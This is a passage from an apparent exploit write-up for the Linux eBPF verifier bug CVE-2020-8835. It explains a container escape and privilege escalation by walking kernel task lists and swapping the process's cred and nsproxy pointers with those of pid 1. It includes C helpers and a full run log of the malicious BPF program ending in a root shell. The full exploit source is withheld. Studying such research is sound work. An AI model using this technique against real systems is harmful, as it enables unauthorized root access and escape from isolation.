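static unsigned int read32_as_uint(const uint8_t *p, size_t off)
{
    uint32_t v;
    memcpy(&v, p + off, sizeof v);
    return v;
}

/* Buggy reassembly: int -> uint64_t sign-extends, so a low half with
 * bit 31 set ORs 0xffffffff into the high word and corrupts the pointer. */
static uint64_t join_halves_signed(const uint8_t *p)
{
    int hi = read32_as_int(p, 4);
    int lo = read32_as_int(p, 0);
    return ((uint64_t)hi << 32) | (uint64_t)lo;
}

/* Correct reassembly: unsigned int -> uint64_t zero-extends. */
static uint64_t join_halves_unsigned(const uint8_t *p)
{
    unsigned int hi = read32_as_uint(p, 4);
    unsigned int lo = read32_as_uint(p, 0);
    return ((uint64_t)hi << 32) | (uint64_t)lo;
}

/* Inverse direction: the 32-bit index (high half) and 32-bit offset
 * (low half) that the text derives from a 64-bit offset_address. */
static uint32_t high_half(uint64_t v) { return (uint32_t)(v >> 32); }
static uint32_t low_half(uint64_t v)  { return (uint32_t)v; }

int main(void)
{
    uint64_t off = 0x1ffffffffULL;  /* constructed offset_address */
    printf("signed   join: 0x%016llx\n",
           (unsigned long long)join_halves_signed(sample_addr_bytes));
    printf("unsigned join: 0x%016llx\n",
           (unsigned long long)join_halves_unsigned(sample_addr_bytes));
    printf("split 0x%llx -> index=%u offset=0x%08x\n",
           (unsigned long long)off, high_half(off), low_half(off));
    return 0;
}
```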

To use this vulnerability for an escape we first need some background, which ZDI also covered; here is a summary.

0x00 init_pid_ns

struct pid_namespace init_pid_ns = {
	.kref = KREF_INIT(2),
	.idr = IDR_INIT(init_pid_ns.idr),
	.pid_allocated = PIDNS_ADDING,
	.level = 0,
	.child_reaper = &init_task,
	.user_ns = &init_user_ns,
	.ns.inum = PROC_PID_INIT_INO,
#ifdef CONFIG_PID_NS
	.ns.ops = &pidns_operations,
#endif
};
EXPORT_SYMBOL_GPL(init_pid_ns);

init_pid_ns is a global variable, so we can locate it by its offset; it is the default pid namespace of processes. Its child_reaper field holds the address of init_task, which is the task_struct of pid 1. Then, in the task_struct structure there is a tasks member:

struct list_head		tasks;

which links all processes together. A quick refresher on the list_head structure:

struct list_head {
	struct list_head *next, *prev;
};

It has two members, next and prev. In task_struct, this_task.tasks.next points at next_task.tasks, so we can iterate over every process and find our own by comparing the pid.
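The tasks-list walk described above, as an added C example that is not the author's exploit code: it reimplements the kernel's two-pointer list_head and container_of in user space over a constructed table of fake task entries, and finds an entry by pid the way a traversal of init_task's list does. struct task, sample_tasks and the pids are constructed stand-ins for the real task_struct.

```c
#include <stddef.h>
#include <stdio.h>

/* Minimal copy of the kernel's intrusive list: the same two-pointer node
 * that task_struct embeds as its `tasks` member. */
struct list_head {
    struct list_head *next, *prev;
};

/* Recover the enclosing structure from a pointer to its embedded node:
 * this is why tasks.next pointing at next_task.tasks is enough. */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Toy stand-in for task_struct with only the fields the walk needs. */
struct task {
    int pid;
    struct list_head tasks;
};

static void list_init(struct list_head *head)
{
    head->next = head;
    head->prev = head;
}

static void list_add_tail(struct list_head *node, struct list_head *head)
{
    node->prev = head->prev;
    node->next = head;
    head->prev->next = node;
    head->prev = node;
}

/* Constructed sample process table (not real kernel data). */
static struct task sample_tasks[4];

/* Link the sample tasks into one circular list anchored at sample_tasks[0],
 * which plays the role of init_task (pid 1). Returns that init task. */
static struct task *build_sample_list(void)
{
    static const int pids[4] = {1, 2, 330, 950};
    list_init(&sample_tasks[0].tasks);
    for (size_t i = 0; i < 4; i++) {
        sample_tasks[i].pid = pids[i];
        if (i > 0)
            list_add_tail(&sample_tasks[i].tasks, &sample_tasks[0].tasks);
    }
    return &sample_tasks[0];
}

/* Walk the circular list from init_task until we come back to it, returning
 * the task with the requested pid, or NULL if no such task exists. */
static struct task *find_task_by_pid(struct task *init_task, int pid)
{
    if (init_task->pid == pid)
        return init_task;
    for (struct list_head *pos = init_task->tasks.next;
         pos != &init_task->tasks; pos = pos->next) {
        struct task *t = container_of(pos, struct task, tasks);
        if (t->pid == pid)
            return t;
    }
    return NULL;
}

int main(void)
{
    struct task *init_task = build_sample_list();
    struct task *me = find_task_by_pid(init_task, 950);
    printf("tasks member offset = %zu\n", offsetof(struct task, tasks));
    printf("pid 950 %s\n", me ? "found" : "not found");
    return 0;
}
```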

task_struct also has a structure pointer:

/* Namespaces: */
struct nsproxy			*nsproxy;

This is the process's namespaces, so changing it lets us escape.

0x01 Escape approach

First, use the leaked ops address and the arbitrary read to leak the address of init_task. Then walk the tasks list over every process in the system to find our own task_struct. Then overwrite our own cred pointer with pid 1's cred pointer, and our nsproxy pointer with pid 1's nsproxy pointer. One last small problem: if you do this and then exit after getting the root shell, KASAN reports a use-after-free. This is because both nsproxy and cred carry a usage counter that records the number of references; since we borrowed the pointers directly without incrementing usage, the cred and nsproxy structures get freed while still referenced, causing the UAF. Incrementing the counters manually fixes it.

0x02 Running it

Walking over every process in the system is quite fun; it feels like being god, hhh. I won't post the full exploit, but here is the runtime log:

pwnht@syzkaller:~/cve-2020-8835$ whoami
pwnht
pwnht@syzkaller:~/cve-2020-8835$ ls -l
total 68
-rwxr-xr-x. 1 pwnht pwnht 23680 Apr 28 09:01 exp
-rw-r--r--. 1 root root 16902 Apr 28 09:00 exp.c
-rwxr-xr-x. 1 pwnht pwnht 13824 Apr 13 06:34 exp1
-rwxrwxrwx. 1 root root 6632 Apr 24 07:29 poc.c
pwnht@syzkaller:~/cve-2020-8835$ ./exp
cmd_fd=3
input_fd=4
output_fd=5
progfd=6
0: (b7) r6 = 0
1: (7b) *(u64 *)(r10 -8) = r6
2: (bf) r2 = r10
3: (07) r2 += -8
4: (18) r1 = 0x0
6: (85) call bpf_map_lookup_elem#1
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R6_w=invP0 R10=fp0 fp-8_w=0000mmmm
8: (95) exit

from 7 to 9: R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6=invP0 R10=fp0 fp-8=0000mmmm
9: (79) r6 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP0 R10=fp0 fp-8=0000mmmm
10: (79) r9 = *(u64 *)(r0 +8)
R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP(id=0) R10=fp0 fp-8=0000mmmm
11: (55) if r9 != 0x0 goto pc+2
R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP(id=0) R9_w=invP0 R10=fp0 fp-8=0000mmmm
12: (b7) r0 = 0
13: (95) exit

from 11 to 14: R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP(id=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
14: (b7) r0 = 0
15: (35) if r6 >= 0x1 goto pc+1
R0_w=invP0 R6_w=invP0 R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
16: (95) exit

from 15 to 17: R0=invP0 R6=invP(id=0,umin_value=1) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
17: (b7) r8 = 1
18: (67) r8 <<= 32
19: (07) r8 += 1
20: (bd) if r6 <= r8 goto pc+1
R0=invP0 R6=invP(id=0,umin_value=4294967298) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
21: (95) exit

from 20 to 22: R0=invP0 R6=invP(id=0,umin_value=1,umax_value=4294967297,var_off=(0x0; 0x1ffffffff)) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
22: (56) if w6 != 0x0 goto pc+1
R0=invP0 R6=invP(id=0,umin_value=1,umax_value=4294967297,var_off=(0x1; 0x100000000)) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
23: (95) exit

from 22 to 24: R0=invP0 R6=invP(id=0,umin_value=1,umax_value=4294967297,var_off=(0x1; 0x100000000)) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
24: (57) r6 &= 2
25: (74) w6 >>= 1
26: (24) w6 *= 400
27: (b7) r7 = 0
28: (7b) *(u64 *)(r10 -8) = r7
29: (bf) r2 = r10
30: (07) r2 += -8
31: (18) r1 = 0x0
33: (85) call bpf_map_lookup_elem#1
34: (55) if r0 != 0x0 goto pc+1
R0=invP0 R6=invP0 R7=invP0 R8=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
35: (95) exit

from 34 to 36: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=invP0 R8=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
36: (bf) r8 = r0
37: (b7) r0 = 0
38: (1f) r8 -= r6
R0_w=invP0 R6=invP0 R7=invP0 R8_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
39: (b7) r7 = 0
40: (7b) *(u64 *)(r10 -8) = r7
41: (bf) r2 = r10
42: (07) r2 += -8
43: (18) r1 = 0x0
45: (85) call bpf_map_lookup_elem#1
46: (55) if r0 != 0x0 goto pc+1
R0=invP0 R6=invP0 R7=invP0 R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
47: (95) exit

from 46 to 48: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=invP0 R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
48: (bf) r7 = r0
49: (55) if r9 != 0x1 goto pc+6
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP1 R10=fp0 fp-8=0000mmmm
50: (79) r9 = *(u64 *)(r8 +0)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP1 R10=fp0 fp-8=0000mmmm
51: (7b) *(u64 *)(r7 +0) = r9
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
52: (79) r9 = *(u64 *)(r8 +288)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
53: (7b) *(u64 *)(r7 +8) = r9
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
54: (b7) r0 = 0
55: (95) exit

from 49 to 56: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
56: (55) if r9 != 0x3 goto pc+7
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
57: (79) r4 = *(u64 *)(r7 +0)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
58: (7b) *(u64 *)(r8 +0) = r4
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
59: (62) *(u32 *)(r8 +24) = 23
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
60: (62) *(u32 *)(r8 +36) = -1
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
61: (62) *(u32 *)(r8 +44) = 0
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
62: (b7) r0 = 0
63: (95) exit

from 56 to 64: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
64: (79) r4 = *(u64 *)(r7 +0)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
65: (7b) *(u64 *)(r8 +64) = r4
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
66: (b7) r0 = 0
67: (95) exit

from 38 to 39 (speculative execution): R0_w=invP0 R6=invP0 R7=invP0 R8_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
39: (b7) r7 = 0
40: (7b) *(u64 *)(r10 -8) = r7
41: (bf) r2 = r10
42: (07) r2 += -8
43: (18) r1 = 0x0
45: (85) call bpf_map_lookup_elem#1
46: safe
processed 72 insns (limit 1000000) max_states_per_insn 0 total_states 6 peak_states 6 mark_read 3

[*] creating socketpair()
[*] attaching bpf backdoor to socket
current pid=950
bpf_arrary_ops=0xffffffff840bcc60
kaslr=0x0
input_map_value_address=0xffff888064704190

tmp_task_address=0xffff88806c950000
tmp_pid=1
good get pid address
pid 1 taskaddress=0xffff88806c950000
pid 1 cred address=0xffff8880696dc600
pid 1 nsproxy address=0xffffffff84adaac0
found pid=2 at 0xffff88806c951740
found pid=3 at 0xffff88806c952e80
found pid=4 at 0xffff88806c9545c0
found pid=5 at 0xffff88806c955d00
found pid=6 at 0xffff88806c998000
found pid=7 at 0xffff88806c999740
found pid=8 at 0xffff88806c99ae80
found pid=9 at 0xffff88806c99c5c0
found pid=10 at 0xffff88806c99dd00
found pid=11 at 0xffff88806c9d0000
found pid=12 at 0xffff88806c9d1740
found pid=13 at 0xffff88806c9d45c0
found pid=14 at 0xffff88806c9d5d00
found pid=15 at 0xffff88806ca08000
found pid=16 at 0xffff88806ca09740
found pid=17 at 0xffff88806ca0ae80
found pid=18 at 0xffff88806ca0c5c0
found pid=19 at 0xffff88806ca0dd00
found pid=20 at 0xffff88806caa0000
found pid=21 at 0xffff88806caa1740
found pid=22 at 0xffff88806caa2e80
found pid=23 at 0xffff88806caa45c0
found pid=24 at 0xffff88806caa5d00
found pid=25 at 0xffff88806c3b8000
found pid=27 at 0xffff88806c3bae80
found pid=71 at 0xffff88806bc90000
found pid=72 at 0xffff88806bc91740
found pid=73 at 0xffff88806bc92e80
found pid=74 at 0xffff88806bc945c0
found pid=75 at 0xffff88806bc95d00
found pid=76 at 0xffff88806ae80000
found pid=77 at 0xffff88806ae81740
found pid=78 at 0xffff88806ae82e80
found pid=79 at 0xffff88806ae845c0
found pid=80 at 0xffff88806ae85d00
found pid=81 at 0xffff88806aa20000
found pid=84 at 0xffff88806aa22e80
found pid=85 at 0xffff88806aa245c0
found pid=86 at 0xffff88806aa25d00
found pid=87 at 0xffff88806a6f0000
found pid=88 at 0xffff88806a6f1740
found pid=89 at 0xffff88806a6f2e80
found pid=90 at 0xffff88806a6f45c0
found pid=91 at 0xffff88806a6f5d00
found pid=92 at 0xffff88806a220000
found pid=93 at 0xffff88806a221740
found pid=99 at 0xffff88806a225d00
found pid=100 at 0xffff888068e40000
found pid=101 at 0xffff888068e41740
found pid=120 at 0xffff8880661d0000
found pid=125 at 0xffff8880662c5d00
found pid=139 at 0xffff88806bc2dd00
found pid=147 at 0xffff88806a2245c0
found pid=151 at 0xffff88806c3ddd00
found pid=194 at 0xffff888066788000
found pid=230 at 0xffff8880662c0000
found pid=236 at 0xffff8880662c1740
found pid=240 at 0xffff888067350000
found pid=243 at 0xffff8880673545c0
found pid=275 at 0xffff888069b8dd00
found pid=330 at 0xffff88806a339740
found pid=331 at 0xffff888065629740
found pid=332 at 0xffff88806a33ae80
found pid=720 at 0xffff888064a49740
found pid=724 at 0xffff888063fa1740
found pid=732 at 0xffff8880699f2e80
found pid=735 at 0xffff8880699f1740
found pid=739 at 0xffff888069ab1740
found pid=745 at 0xffff8880664845c0
found pid=789 at 0xffff888063e31740
found pid=790 at 0xffff888065461740
found pid=950 at 0xffff8880654645c0
found !!!
own_task address at 0xffff8880654645c0
own task cred address at 0xffff888065464c28
own task nsproxy address at 0xffff888065464c88

pid 1 cred usage=1
write cred success
pid 1 nsproxy usage=80
write ns success
got root
root@syzkaller:~/cve-2020-8835# whoami
root
root@syzkaller:~/cve-2020-8835#